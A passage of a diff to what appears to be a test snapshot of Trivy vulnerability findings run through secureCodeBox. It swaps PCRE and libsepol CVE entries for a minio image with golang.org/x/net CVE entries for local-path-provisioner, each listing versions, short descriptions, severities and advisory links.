"https://access.redhat.com/security/cve/CVE-2022-1587", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2077983,", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1587", - }, - { - "type": "URL", - "value": "https://github.com/PCRE2Project/pcre2/commit/03654e751e7f0700693526b67dfcadda6b42c9d0", + "value": "https://avd.aquasec.com/nvd/cve-2021-33194", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-1587.html", + "value": "https://access.redhat.com/security/cve/CVE-2021-33194", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-5251.html", + "value": "https://github.com/advisories/GHSA-83g2-8m93-v3w7", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/03/msg00014.html", + "value": "https://github.com/golang/net/commit/37e1c6afe02340126705deced573a85ab75209d7", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DWNG2NS3GINO6LQYUVC4BZLUQPJ3DYHA/", + "value": "https://go.dev/cl/311090", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXINO3KKI5DICQ45E2FKD6MKVMGJLEKJ/", + "value": "https://go.dev/issue/46288", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KAX7767BCUFC7JMDGP7GOQ5GIZCAUGBB/", + "value": "https://go.googlesource.com/net/+/37e1c6afe02340126705deced573a85ab75209d7", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/M2GLQQUEY5VFM57CFYXVIFOXN2HUZPDM/", + "value": "https://groups.google.com/g/golang-announce/c/wPunbCPkWUg", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-1587", + "value": "https://groups.google.com/g/golang-dev/c/28x0nthP-c8/m/KqWVTjsnBAAJ", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20221028-0009/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4CHKSFMHZVOBCZSSVRE3UEYNKARTBMTM/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5627-1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-33194", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5627-2", + "value": "https://pkg.go.dev/vuln/GO-2021-0238", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-1587", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-33194", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2017-11164", - "installedVersion": "2:8.39-13", - "packageName": "libpcre3", + "fixedVersion": "0.0.0-20211209124913-491a49abca63", + "foundIn": "Target: 'usr/local/bin/local-path-provisioner' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2021-44716", + "installedVersion": "v0.0.0-20201021035429-f5854403a974", + "packageName": "golang.org/x/net", "references": [ - "http://openwall.com/lists/oss-security/2017/07/11/3", - "http://www.openwall.com/lists/oss-security/2023/04/11/1", - "http://www.openwall.com/lists/oss-security/2023/04/12/1", - "http://www.securityfocus.com/bid/99575", - "https://access.redhat.com/security/cve/CVE-2017-11164", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11164", - "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2017-11164", - "https://www.cve.org/CVERecord?id=CVE-2017-11164", + "https://access.redhat.com/security/cve/CVE-2021-44716", + "https://cert-portal.siemens.com/productcert/pdf/ssa-744259.pdf", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44716", + "https://github.com/advisories/GHSA-vc3p-29h2-gpcp", + "https://github.com/golang/go/commit/48d948963c5ce7add72af5665a871caff6c1d35a (go1.17.5)", + "https://github.com/golang/go/issues/50058", + "https://github.com/golang/net/commit/491a49abca63de5e07ef554052d180a1b5fe2d70", + "https://go.dev/cl/369794", + "https://go.dev/issue/50058", + "https://groups.google.com/g/golang-announce/c/hcmEScgc00k", + "https://groups.google.com/g/golang-announce/c/hcmEScgc00k/m/ZWnOjeY4CQAJ", + "https://linux.oracle.com/cve/CVE-2021-44716.html", + "https://linux.oracle.com/errata/ELSA-2022-0001.html", + "https://lists.debian.org/debian-lts-announce/2022/01/msg00016.html", + "https://lists.debian.org/debian-lts-announce/2022/01/msg00017.html", + "https://lists.debian.org/debian-lts-announce/2023/04/msg00021.html", + "https://nvd.nist.gov/vuln/detail/CVE-2021-44716", + "https://pkg.go.dev/vuln/GO-2022-0288", + "https://security.gentoo.org/glsa/202208-02", + "https://security.netapp.com/advisory/ntap-20220121-0002/", + "https://www.cve.org/CVERecord?id=CVE-2021-44716", ], }, "category": "Vulnerability", - "description": "In PCRE 8.41, the OP_KETRMAX feature in the match function in pcre_exec.c allows stack exhaustion (uncontrolled recursion) when processing a crafted regular expression.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "description": "net/http in Go before 1.16.12 and 1.17.x before 1.17.5 allows uncontrolled memory consumption in the header canonicalization cache via HTTP/2 requests.", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", "mitigation": undefined, - "name": "pcre: OP_KETRMAX feature in the match function in pcre_exec.c", + "name": "golang: net/http: limit growth of header canonicalization cache", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2017-11164", + "value": "https://avd.aquasec.com/nvd/cve-2021-44716", }, { "type": "URL", - "value": "http://openwall.com/lists/oss-security/2017/07/11/3", + "value": "https://access.redhat.com/security/cve/CVE-2021-44716", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/04/11/1", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-744259.pdf", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/04/12/1", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44716", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/99575", + "value": "https://github.com/advisories/GHSA-vc3p-29h2-gpcp", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2017-11164", + "value": "https://github.com/golang/go/commit/48d948963c5ce7add72af5665a871caff6c1d35a (go1.17.5)", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11164", + "value": "https://github.com/golang/go/issues/50058", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "value": "https://github.com/golang/net/commit/491a49abca63de5e07ef554052d180a1b5fe2d70", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2017-11164", + "value": "https://go.dev/cl/369794", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2017-11164", + "value": "https://go.dev/issue/50058", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2017-16231", - "installedVersion": "2:8.39-13", - "packageName": "libpcre3", - "references": [ - "http://packetstormsecurity.com/files/150897/PCRE-8.41-Buffer-Overflow.html", - "http://seclists.org/fulldisclosure/2018/Dec/33", - "http://www.openwall.com/lists/oss-security/2017/11/01/11", - "http://www.openwall.com/lists/oss-security/2017/11/01/3", - "http://www.openwall.com/lists/oss-security/2017/11/01/7", - "http://www.openwall.com/lists/oss-security/2017/11/01/8", - "http://www.securityfocus.com/bid/101688", - "https://access.redhat.com/security/cve/CVE-2017-16231", - "https://bugs.exim.org/show_bug.cgi?id=2047", - "https://nvd.nist.gov/vuln/detail/CVE-2017-16231", - "https://www.cve.org/CVERecord?id=CVE-2017-16231", - ], - }, - "category": "Vulnerability", - "description": "** DISPUTED ** In PCRE 8.41, after compiling, a pcretest load test PoC produces a crash overflow in the function match() in pcre_exec.c because of a self-recursive call. NOTE: third parties dispute the relevance of this report, noting that there are options that can be used to limit the amount of stack that is used.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "pcre: self-recursive call in match() in pcre_exec.c leads to denial of service", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2017-16231", + "value": "https://groups.google.com/g/golang-announce/c/hcmEScgc00k", }, { "type": "URL", - "value": "http://packetstormsecurity.com/files/150897/PCRE-8.41-Buffer-Overflow.html", + "value": "https://groups.google.com/g/golang-announce/c/hcmEScgc00k/m/ZWnOjeY4CQAJ", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2018/Dec/33", + "value": "https://linux.oracle.com/cve/CVE-2021-44716.html", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2017/11/01/11", + "value": "https://linux.oracle.com/errata/ELSA-2022-0001.html", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2017/11/01/3", + "value": "https://lists.debian.org/debian-lts-announce/2022/01/msg00016.html", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2017/11/01/7", + "value": "https://lists.debian.org/debian-lts-announce/2022/01/msg00017.html", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2017/11/01/8", + "value": "https://lists.debian.org/debian-lts-announce/2023/04/msg00021.html", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/101688", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-44716", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2017-16231", + "value": "https://pkg.go.dev/vuln/GO-2022-0288", }, { "type": "URL", - "value": "https://bugs.exim.org/show_bug.cgi?id=2047", + "value": "https://security.gentoo.org/glsa/202208-02", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2017-16231", + "value": "https://security.netapp.com/advisory/ntap-20220121-0002/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2017-16231", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-44716", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2017-7245", - "installedVersion": "2:8.39-13", - "packageName": "libpcre3", + "fixedVersion": "0.0.0-20220906165146-f3363e06e74c", + "foundIn": "Target: 'usr/local/bin/local-path-provisioner' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-27664", + "installedVersion": "v0.0.0-20201021035429-f5854403a974", + "packageName": "golang.org/x/net", "references": [ - "http://www.securityfocus.com/bid/97067", - "https://access.redhat.com/errata/RHSA-2018:2486", - "https://access.redhat.com/security/cve/CVE-2017-7245", - "https://blogs.gentoo.org/ago/2017/03/20/libpcre-two-stack-based-buffer-overflow-write-in-pcre32_copy_substring-pcre_get-c/", - "https://nvd.nist.gov/vuln/detail/CVE-2017-7245", - "https://security.gentoo.org/glsa/201710-25", - "https://www.cve.org/CVERecord?id=CVE-2017-7245", + "https://access.redhat.com/errata/RHSA-2023:2357", + "https://access.redhat.com/security/cve/CVE-2022-27664", + "https://bugzilla.redhat.com/2107371", + "https://bugzilla.redhat.com/2107374", + "https://bugzilla.redhat.com/2107383", + "https://bugzilla.redhat.com/2107386", + "https://bugzilla.redhat.com/2107388", + "https://bugzilla.redhat.com/2113814", + "https://bugzilla.redhat.com/2124669", + "https://bugzilla.redhat.com/2132868", + "https://bugzilla.redhat.com/2132872", + "https://bugzilla.redhat.com/2161274", + "https://bugzilla.redhat.com/show_bug.cgi?id=1913333", + "https://bugzilla.redhat.com/show_bug.cgi?id=1913338", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", + "https://bugzilla.redhat.com/show_bug.cgi?id=2113814", + "https://bugzilla.redhat.com/show_bug.cgi?id=2124669", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28851", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28852", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27664", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32189", + "https://errata.almalinux.org/9/ALSA-2023-2357.html", + "https://errata.rockylinux.org/RLSA-2022:7129", + "https://github.com/advisories/GHSA-69cg-p879-7622", + "https://github.com/golang/go/commit/5bc9106458fc07851ac324a4157132a91b1f3479 (go1.18.6)", + "https://github.com/golang/go/commit/9cfe4e258b1c9d4a04a42539c21c7bdb2e227824 (go1.19.1)", + "https://github.com/golang/go/issues/54658", + "https://go.dev/cl/428735", + "https://go.dev/issue/54658", + "https://groups.google.com/g/golang-announce", + "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s", + "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s/m/0tgO0pjiBQAJ", + "https://linux.oracle.com/cve/CVE-2022-27664.html", + "https://linux.oracle.com/errata/ELSA-2023-2802.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXKTHIGE5F576MAPFYCIJXNRGBSPISUF/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXS2OQ57KZC5XZKK5UW4SYKPVQAHIOJX/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-27664", + "https://pkg.go.dev/vuln/GO-2022-0969", + "https://security.gentoo.org/glsa/202209-26", + "https://security.netapp.com/advisory/ntap-20220923-0004/", + "https://ubuntu.com/security/notices/USN-6038-1", + "https://www.cve.org/CVERecord?id=CVE-2022-27664", ], }, "category": "Vulnerability", - "description": "Stack-based buffer overflow in the pcre32_copy_substring function in pcre_get.c in libpcre1 in PCRE 8.40 allows remote attackers to cause a denial of service (WRITE of size 4) or possibly have unspecified other impact via a crafted file.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "description": "In net/http in Go before 1.18.6 and 1.19.x before 1.19.1, attackers can cause a denial of service because an HTTP/2 connection can hang during closing if shutdown were preempted by a fatal error.", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", "mitigation": undefined, - "name": "pcre: stack-based buffer overflow write in pcre32_copy_substring", + "name": "handle server errors after sending GOAWAY", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2017-7245", + "value": "https://avd.aquasec.com/nvd/cve-2022-27664", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/97067", + "value": "https://access.redhat.com/errata/RHSA-2023:2357", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2018:2486", + "value": "https://access.redhat.com/security/cve/CVE-2022-27664", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2017-7245", + "value": "https://bugzilla.redhat.com/2107371", }, { "type": "URL", - "value": "https://blogs.gentoo.org/ago/2017/03/20/libpcre-two-stack-based-buffer-overflow-write-in-pcre32_copy_substring-pcre_get-c/", + "value": "https://bugzilla.redhat.com/2107374", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2017-7245", + "value": "https://bugzilla.redhat.com/2107383", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/201710-25", + "value": "https://bugzilla.redhat.com/2107386", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2017-7245", + "value": "https://bugzilla.redhat.com/2107388", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2017-7246", - "installedVersion": "2:8.39-13", - "packageName": "libpcre3", - "references": [ - "http://www.securityfocus.com/bid/97067", - "https://access.redhat.com/errata/RHSA-2018:2486", - "https://access.redhat.com/security/cve/CVE-2017-7246", - "https://blogs.gentoo.org/ago/2017/03/20/libpcre-two-stack-based-buffer-overflow-write-in-pcre32_copy_substring-pcre_get-c/", - "https://nvd.nist.gov/vuln/detail/CVE-2017-7246", - "https://security.gentoo.org/glsa/201710-25", - "https://www.cve.org/CVERecord?id=CVE-2017-7246", - ], - }, - "category": "Vulnerability", - "description": "Stack-based buffer overflow in the pcre32_copy_substring function in pcre_get.c in libpcre1 in PCRE 8.40 allows remote attackers to cause a denial of service (WRITE of size 268) or possibly have unspecified other impact via a crafted file.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "pcre: stack-based buffer overflow write in pcre32_copy_substring", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2017-7246", + "value": "https://bugzilla.redhat.com/2113814", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/97067", + "value": "https://bugzilla.redhat.com/2124669", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2018:2486", + "value": "https://bugzilla.redhat.com/2132868", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2017-7246", + "value": "https://bugzilla.redhat.com/2132872", }, { "type": "URL", - "value": "https://blogs.gentoo.org/ago/2017/03/20/libpcre-two-stack-based-buffer-overflow-write-in-pcre32_copy_substring-pcre_get-c/", + "value": "https://bugzilla.redhat.com/2161274", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2017-7246", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1913333", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/201710-25", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1913338", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2017-7246", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-20838", - "installedVersion": "2:8.39-13", - "packageName": "libpcre3", - "references": [ - "http://seclists.org/fulldisclosure/2020/Dec/32", - "http://seclists.org/fulldisclosure/2021/Feb/14", - "https://access.redhat.com/security/cve/CVE-2019-20838", - "https://bugs.gentoo.org/717920", - "https://bugzilla.redhat.com/show_bug.cgi?id=1848436", - "https://bugzilla.redhat.com/show_bug.cgi?id=1848444", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20838", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14155", - "https://errata.almalinux.org/8/ALSA-2021-4373.html", - "https://errata.rockylinux.org/RLSA-2021:4373", - "https://linux.oracle.com/cve/CVE-2019-20838.html", - "https://linux.oracle.com/errata/ELSA-2021-4373.html", - "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2019-20838", - "https://support.apple.com/kb/HT211931", - "https://support.apple.com/kb/HT212147", - "https://ubuntu.com/security/notices/USN-5425-1", - "https://www.cve.org/CVERecord?id=CVE-2019-20838", - "https://www.pcre.org/original/changelog.txt", - ], - }, - "category": "Vulnerability", - "description": "libpcre in PCRE before 8.43 allows a subject buffer over-read in JIT when UTF is disabled, and \\X or \\R has more than one fixed quantifier, a related issue to CVE-2019-20454.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "pcre: Buffer over-read in JIT when UTF is disabled and \\X or \\R has fixed quantifier greater than 1", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-20838", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2020/Dec/32", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2021/Feb/14", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-20838", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", }, { "type": "URL", - "value": "https://bugs.gentoo.org/717920", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2113814", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1848436", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2124669", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1848444", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28851", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20838", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28852", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14155", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", }, { "type": "URL", - "value": "https://errata.almalinux.org/8/ALSA-2021-4373.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27664", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2021:4373", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2019-20838.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-4373.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-20838", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32189", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT211931", + "value": "https://errata.almalinux.org/9/ALSA-2023-2357.html", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT212147", + "value": "https://errata.rockylinux.org/RLSA-2022:7129", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5425-1", + "value": "https://github.com/advisories/GHSA-69cg-p879-7622", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-20838", + "value": "https://github.com/golang/go/commit/5bc9106458fc07851ac324a4157132a91b1f3479 (go1.18.6)", }, { "type": "URL", - "value": "https://www.pcre.org/original/changelog.txt", + "value": "https://github.com/golang/go/commit/9cfe4e258b1c9d4a04a42539c21c7bdb2e227824 (go1.19.1)", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-36084", - "installedVersion": "3.1-1", - "packageName": "libsepol1", - "references": [ - "https://access.redhat.com/security/cve/CVE-2021-36084", - "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=31065", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", - "https://errata.almalinux.org/8/ALSA-2021-4513.html", - "https://errata.rockylinux.org/RLSA-2021:4513", - "https://github.com/SELinuxProject/selinux/commit/f34d3d30c8325e4847a6b696fe7a3936a8a361f3", - "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-417.yaml", - "https://linux.oracle.com/cve/CVE-2021-36084.html", - "https://linux.oracle.com/errata/ELSA-2021-4513.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-36084", - "https://ubuntu.com/security/notices/USN-5391-1", - "https://www.cve.org/CVERecord?id=CVE-2021-36084", - ], - }, - "category": "Vulnerability", - "description": "The CIL compiler in SELinux 3.2 has a use-after-free in __cil_verify_classperms (called from __cil_verify_classpermission and __cil_pre_verify_helper).", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "libsepol: use-after-free in __cil_verify_classperms()", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-36084", + "value": "https://github.com/golang/go/issues/54658", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-36084", + "value": "https://go.dev/cl/428735", }, { "type": "URL", - "value": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=31065", + "value": "https://go.dev/issue/54658", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", + "value": "https://groups.google.com/g/golang-announce", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", + "value": "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", + "value": "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s/m/0tgO0pjiBQAJ", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", + "value": "https://linux.oracle.com/cve/CVE-2022-27664.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", + "value": "https://linux.oracle.com/errata/ELSA-2023-2802.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXKTHIGE5F576MAPFYCIJXNRGBSPISUF/", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXS2OQ57KZC5XZKK5UW4SYKPVQAHIOJX/", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-27664", }, { "type": "URL", - "value": "https://errata.almalinux.org/8/ALSA-2021-4513.html", + "value": "https://pkg.go.dev/vuln/GO-2022-0969", + }, + { + "type": "URL", + "value": "https://security.gentoo.org/glsa/202209-26", + }, + { + "type": "URL", + "value": "https://security.netapp.com/advisory/ntap-20220923-0004/", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-6038-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-27664", + }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "0.7.0", + "foundIn": "Target: 'usr/local/bin/local-path-provisioner' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-41723", + "installedVersion": "v0.0.0-20201021035429-f5854403a974", + "packageName": "golang.org/x/net", + "references": [ + "https://access.redhat.com/security/cve/CVE-2022-41723", + "https://github.com/advisories/GHSA-vvpx-j8f3-3w6h", + "https://go.dev/cl/468135", + "https://go.dev/cl/468295", + "https://go.dev/issue/57855", + "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4MA5XS5DAOJ5PKKNG5TUXKPQOFHT5VBC/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RGW7GE2Z32ZT47UFAQFDRQE33B7Q7LMT/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RLBQ3A7ROLEQXQLXFDLNJ7MYPKG5GULE/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XX3IMUTZKRQ73PBZM4E2JP4BKYH4C6XE/", + 